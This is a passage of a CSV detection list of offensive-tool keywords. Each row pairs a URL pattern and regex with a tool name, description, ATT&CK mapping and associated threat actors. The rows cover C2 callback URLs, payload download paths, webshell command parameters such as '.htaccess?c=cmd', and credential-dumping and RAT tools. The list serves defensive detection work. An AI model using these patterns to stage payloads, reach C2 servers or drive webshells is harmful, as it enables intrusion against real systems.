callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47381" "*http://*.oastify.com/*",".{0,1000}http\:\/\/.{0,1000}\.oastify\.com\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 
- T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47382" "*http://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47383" "*http://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47388" "*http://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47389" "*http://*/.htaccess?c=cmd*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47393" 
"*http://*/.htaccess?c=uname -a*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47394" "*http://*/FortyNorth/GetIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/GetIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","47395" "*http://*/FortyNorth/PostIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/PostIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","47396" "*http://*:*/down/*/host.ps1*",".{0,1000}http\:\/\/.{0,1000}\:.{0,1000}\/down\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","47397" "*http://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}http\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll 
has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","47399" "*http://0hRIb4t1fWNPYBVA.net/index.php*",".{0,1000}http\:\/\/0hRIb4t1fWNPYBVA\.net\/index\.php.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","47400" "*http://0x0.st/tm*",".{0,1000}http\:\/\/0x0\.st\/tm.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","47401" "*http://10.10.13.37*",".{0,1000}http\:\/\/10\.10\.13\.37.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","47402" "*http://101.251.217.210*",".{0,1000}http\:\/\/101\.251\.217\.210.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","47403" 
"*http://127.0.0.1*/nlaksnfaobcaowb*",".{0,1000}http\:\/\/127\.0\.0\.1.{0,1000}\/nlaksnfaobcaowb.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","47404" "*http://127.0.0.1/CrossC2*",".{0,1000}http\:\/\/127\.0\.0\.1\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","47405" "*http://127.0.0.1/FUZZ*",".{0,1000}http\:\/\/127\.0\.0\.1\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","47406" "*http://127.0.0.1/handshake.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47407" "*http://127.0.0.1/ntdll.dll*",".{0,1000}http\:\/\/127\.0\.0\.1\/ntdll\.dll.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/TrickDump","1","1","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","47408" "*http://127.0.0.1/proxy.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/proxy\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","47409" "*http://127.0.0.1/rat/*",".{0,1000}http\:\/\/127\.0\.0\.1\/rat\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","47410" "*http://127.0.0.1/Renge_x64.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\/Renge_x64\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","47411" "*http://127.0.0.1/shell.jsp*",".{0,1000}http\:\/\/127\.0\.0\.1\/shell\.jsp.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","47412" "*http://127.0.0.1/wpad.dat*",".{0,1000}http\:\/\/127\.0\.0\.1\/wpad\.dat.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","47413" "*http://127.0.0.1:3000/ui/panel*",".{0,1000}http\:\/\/127\.0\.0\.1\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47416" "*http://127.0.0.1:35000*",".{0,1000}http\:\/\/127\.0\.0\.1\:35000.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","47418" "*http://127.0.0.1:443/aaaaaaaaa*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/aaaaaaaaa.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","47422" "*http://127.0.0.1:443/bbbbbbbbb*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/bbbbbbbbb.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - 
T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","47423" "*http://127.0.0.1:50000/payload/upload*",".{0,1000}http\:\/\/127\.0\.0\.1\:50000\/payload\/upload.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","47424" "*http://127.0.0.1:7444*",".{0,1000}http\:\/\/127\.0\.0\.1\:7444.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","47425" "*http://127.0.0.1:7474/browser/*",".{0,1000}http\:\/\/127\.0\.0\.1\:7474\/browser\/.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","neo4j default local url","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","47426" "*http://127.0.0.1:80/file.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\:80\/file\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from
Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","47427" "*http://127.0.0.1:8000/1.jpg*",".{0,1000}http\:\/\/127\.0\.0\.1\:8000\/1\.jpg.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","47428" "*http://127.0.0.1:8070*",".{0,1000}http\:\/\/127\.0\.0\.1\:8070.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","47430" "*http://127.0.0.1:8080/invoker/JMXInvokerServlet*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/invoker\/JMXInvokerServlet.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - 
INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47431" "*http://127.0.0.1:8080/shellcode.bin*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/shellcode\.bin.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","47432" "*http://127.0.0.1:8080/target.dll*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/target\.dll.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","47433" "*http://127.0.0.1:81/test.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\:81\/test\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","47434" "*http://127.0.0.1:9090/*",".{0,1000}http\:\/\/127\.0\.0\.1\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47436" "*http://161.35.200.18*",".{0,1000}http\:\/\/161\.35\.200\.18.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47438" "*http://192.168.1.179:8000/session*",".{0,1000}http\:\/\/192\.168\.1\.179\:8000\/session.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","47439" "*http://192.168.126.130/upload.php*",".{0,1000}http\:\/\/192\.168\.126\.130\/upload\.php.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","47440" "*http://212.111.43.206:9090/pk.html*",".{0,1000}http\:\/\/212\.111\.43\.206\:9090\/pk\.html.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","47441" "*http://37.120.235.188/blah.tar.gz*",".{0,1000}http\:\/\/37\.120\.235\.188\/blah\.tar\.gz.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47442" "*http://3wifi.stascorp.com/3wifi.php*",".{0,1000}http\:\/\/3wifi\.stascorp\.com\/3wifi\.php.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential 
Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","47443" "*http://adzok.net/downloadfree.php*",".{0,1000}http\:\/\/adzok\.net\/downloadfree\.php.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","47444" "*http://bit.ly/1qMn59d*",".{0,1000}http\:\/\/bit\.ly\/1qMn59d.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","47448" "*http://bit.ly/2TxpA4h*",".{0,1000}http\:\/\/bit\.ly\/2TxpA4h.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","47449" "*http://blog.gentilkiwi.com/mimikatz*",".{0,1000}http\:\/\/blog\.gentilkiwi\.com\/mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - 
T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","47450" "*http://blog.sevagas.com/?Hacking-around-HTA-files*",".{0,1000}http\:\/\/blog\.sevagas\.com\/\?Hacking\-around\-HTA\-files.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
